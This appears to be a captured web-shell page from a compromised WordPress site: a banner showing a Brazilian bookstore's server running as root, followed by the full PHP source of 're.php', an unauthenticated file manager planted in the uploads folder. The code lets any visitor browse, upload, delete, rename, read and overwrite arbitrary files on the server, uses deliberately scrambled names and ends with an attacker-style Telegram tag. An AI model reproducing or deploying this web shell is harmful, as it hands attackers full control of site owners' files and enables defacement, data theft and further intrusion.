HEX
Server: LiteSpeed
System: Linux ubuntu-8gb-hel1-1 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: root (0)
PHP: 8.3.24
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /mnt/HC_Volume_101697859/livrariaeconomica.com.br/wp-content/uploads/wpcode/
Upload Files
File: /mnt/HC_Volume_101697859/livrariaeconomica.com.br/wp-content/uploads/wpcode/re.php
<?php
// ----------------------------
// GIBBERISH FILE MANAGER
// ----------------------------
header('Content-Type: text/html; charset=UTF-8');

// path resolver (chaotic names)
$z__ = (isset($_GET['p']) && realpath($_GET['p'])) ? realpath($_GET['p']) : realpath('.');
if (!$z__) { $z__ = getcwd(); }

// upload handler
if (!empty($_FILES['xfile']['name']) && isset($_FILES['xfile']['error']) && $_FILES['xfile']['error'] === UPLOAD_ERR_OK) {
    $tok = $z__ . '/' . basename($_FILES['xfile']['name']);
    @move_uploaded_file($_FILES['xfile']['tmp_name'], $tok);
    header('Location: ?p=' . urlencode($z__)); exit;
}

// make dir (weird)
if (!empty($_POST['mk___'])) {
    $nm = trim($_POST['mk___']);
    if ($nm !== '') { @mkdir($z__ . '/' . $nm); }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// delete (d param)
if (!empty($_GET['d'])) {
    $vict = realpath($z__ . '/' . $_GET['d']);
    if ($vict) {
        if (is_dir($vict)) { @rmdir($vict); } else { @unlink($vict); }
    }
    header('Location: ?p=' . urlencode($z__)); exit;
}

// rename (rfrom, rto)
if (!empty($_POST['rfrom']) && isset($_POST['rto']) && $_POST['rto'] !== '') {
    $a = $z__ . '/' . $_POST['rfrom'];
    $b = $z__ . '/' . $_POST['rto'];
    @rename($a, $b);
    header('Location: ?p=' . urlencode($z__)); exit;
}

// save edit (sf, sb)
if (!empty($_POST['sf']) && isset($_POST['sb'])) {
    @file_put_contents($_POST['sf'], $_POST['sb']);
    header('Location: ?p=' . urlencode(dirname($_POST['sf']))); exit;
}

// read dir (scrambled)
$___list = @scandir($z__);
if (!is_array($___list)) { $___list = []; }

// chaotic UI
echo "<div style='font-family:Verdana,monospace;'>";
echo "<h2>⚙️  G33k-File — " . htmlspecialchars($z__) . "</h2>";
echo "<a href='?p=" . urlencode(dirname($z__)) . "' style='text-decoration:none;'>← up</a><br><br>";

// upload form (names are weird)
echo "<form method='POST' enctype='multipart/form-data' style='display:inline-block;margin-right:12px;'>
    <input type='file' name='xfile'>
    <button type='submit'>upload</button>
</form>";

// mkdir form
echo "<form method='POST' style='display:inline-block;'>
    <input type='text' name='mk___' placeholder='new folder'>
    <button type='submit'>mkdir</button>
</form>";

echo "<br><br>";
echo "<table cellpadding='6' cellspacing='0' border='1' style='border-collapse:collapse;font-size:14px;'>";
echo "<tr><th style='min-width:300px'>name</th><th>actions</th></tr>";

foreach ($___list as $n) {
    if ($n === '.' || $n === '..') continue;
    $full = $z__ . '/' . $n;
    echo "<tr><td style='padding:6px;'>";
    if (is_dir($full)) {
        echo "<a href='?p=" . urlencode($full) . "'>📁 " . htmlspecialchars($n) . "</a>";
    } else {
        echo "📄 " . htmlspecialchars($n);
    }
    echo "</td><td style='padding:6px;'>";

    // rename tiny form
    echo "<form method='POST' style='display:inline-block;margin-right:6px;'>
        <input type='hidden' name='rfrom' value='" . htmlspecialchars($n) . "'>
        <input type='text' name='rto' placeholder='rename'>
        <button type='submit'>→</button>
    </form>";

    // delete link
    echo "<a href='?p=" . urlencode($z__) . "&d=" . rawurlencode($n) . "' onclick='return confirm(\"remove " . addslashes($n) . "?\")' style='margin-right:6px;'>🗑</a>";

    // download & edit if file
    if (is_file($full)) {
        $pub = str_replace($_SERVER['DOCUMENT_ROOT'], '', $full);
        if ($pub === '') { $pub = '/' . ltrim(str_replace('\\','/',$full), '/'); } // fallback
        echo "<a href='" . htmlspecialchars($pub) . "' download style='margin-right:6px;'>⬇</a>";
        echo "<a href='?p=" . urlencode($z__) . "&e=" . rawurlencode($n) . "'>✎</a>";
    }

    echo "</td></tr>";
}
echo "</table>";

// editor (e param)
if (!empty($_GET['e'])) {
    $tfn = $z__ . '/' . $_GET['e'];
    if (is_file($tfn) && is_readable($tfn)) {
        $cont = htmlspecialchars(file_get_contents($tfn));
        echo "<h3 style='margin-top:18px;'>editing: " . htmlspecialchars($_GET['e']) . "</h3>";
        echo "<form method='POST'>
            <input type='hidden' name='sf' value='" . htmlspecialchars($tfn) . "'>
            <textarea name='sb' rows='18' cols='100' style='font-family:monospace;'>" . $cont . "</textarea><br>
            <button type='submit'>save</button>
        </form>";
    } else {
        echo "<p>cannot open file.</p>";
    }
}

echo "</div>";
?>
@ Telegram